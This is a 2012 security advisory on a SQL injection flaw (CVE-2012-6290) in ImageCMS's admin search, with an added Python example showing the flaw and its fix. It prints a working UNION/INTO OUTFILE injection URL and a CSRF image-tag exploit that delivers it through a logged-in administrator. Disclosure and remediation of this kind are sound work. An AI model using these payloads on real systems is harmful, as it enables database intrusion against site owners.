High-Tech Bridge, HTB23132
Dec 05, 2012 - 12:00 a.m.

SQL Injection Vulnerability in ImageCMS

2012-12-05 00:00:00
High-Tech Bridge
www.htbridge.com

EPSS: 0.001 (Low)

Percentile: 50.5%

High-Tech Bridge Security Research Lab discovered a vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.

  1. SQL injection vulnerability in ImageCMS: CVE-2012-6290
    The vulnerability exists due to insufficient filtering of the “q” HTTP GET parameter passed to “/admin/admin_search/”. A remote authenticated administrator can execute arbitrary SQL commands in the application’s database.
    Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create the “/tmp/file.txt” file with the MySQL server version inside:
    http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202
    This vulnerability can also be exploited by a remote non-authenticated attacker via a CSRF vector, because the application is prone to Cross-Site Request Forgery attacks. To do so, the attacker must trick a logged-in administrator into visiting a web page containing the CSRF exploit.
    Basic CSRF exploit example:
    <img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">
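The two weaknesses described above (the unparameterized “q” search and the missing CSRF protection on the admin endpoint) are shown below in a self-contained Python example. This is added illustration, not ImageCMS code: it assumes a constructed in-memory SQLite table in place of the CMS database, uses SQLite's sqlite_version() where the advisory's payload calls MySQL's version(), and assumes a per-session CSRF token scheme (issue_csrf_token / handle_admin_search are hypothetical names). The vulnerable function reproduces the string-splicing pattern that lets a quote in “q” turn the rest of the parameter into SQL; the safe function binds the same value as a parameter, and the handler refuses any request that does not carry the session's token, which is exactly what a forged `<img src=...>` request cannot supply.

```python
"""Added example (not ImageCMS code): the vulnerable query pattern behind
CVE-2012-6290 beside its parameterized form, plus a CSRF token check for
the admin search endpoint. Runs offline against an in-memory SQLite table."""
import hmac
import secrets
import sqlite3
from urllib.parse import parse_qs, quote, urlsplit


def make_db():
    """Constructed stand-in for whatever table the CMS admin search queries."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("Welcome", "Home page"), ("Release 123", "Notes")],
    )
    con.commit()
    return con


def db_version(con):
    """Engine version string, so callers can recognise leaked data below."""
    return con.execute("SELECT sqlite_version()").fetchone()[0]


def search_vulnerable(con, q):
    """The flaw the advisory describes: q is spliced into the SQL text, so a
    quote in q closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT id, title, body FROM pages WHERE title LIKE '%" + q + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, q):
    """Fix: bind q as a parameter. The driver sends it as data, never as SQL,
    so quotes, UNION and comment sequences in q are just characters to match."""
    sql = "SELECT id, title, body FROM pages WHERE title LIKE ?"
    return con.execute(sql, ("%" + q + "%",)).fetchall()


def issue_csrf_token():
    """Per-session random token, stored server-side and embedded in admin
    forms and links (hypothetical scheme, assumed for this example)."""
    return secrets.token_urlsafe(32)


def handle_admin_search(con, url, session_csrf_token):
    """Admin endpoint with both fixes applied: reject requests that do not
    carry the session's CSRF token (a cross-site <img> request cannot know
    it), then run the parameterized search. Returns an HTTP-like status."""
    params = parse_qs(urlsplit(url).query)
    supplied = params.get("csrf", [""])[0]
    # Constant-time comparison; an empty or wrong token is refused.
    if not hmac.compare_digest(supplied, session_csrf_token):
        return {"status": 403, "rows": []}
    q = params.get("q", [""])[0]
    return {"status": 200, "rows": search_safe(con, q)}


if __name__ == "__main__":
    con = make_db()
    # SQLite analogue of the advisory's input: quote, UNION, comment marker.
    payload = "123' UNION SELECT 1, sqlite_version(), 3 -- "
    print("vulnerable:", search_vulnerable(con, payload))  # leaks db version
    print("safe:      ", search_safe(con, payload))        # no rows match
    token = issue_csrf_token()
    forged = "/admin/admin_search?q=" + quote(payload)
    legit = "/admin/admin_search?q=123&csrf=" + token
    print("forged request status:", handle_admin_search(con, forged, token)["status"])
    print("legit request status: ", handle_admin_search(con, legit, token)["status"])
```

Running the block prints the engine version inside the vulnerable result set and an empty result from the parameterized query for the same input; the handler answers 403 to the token-less request and 200 to the one carrying the session token. Note that a token check only helps if the admin search is also not reachable by an unauthenticated session; the parameter binding is what removes the injection itself.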
CPE Name    Operator    Version
imagecms    le          4.0.0b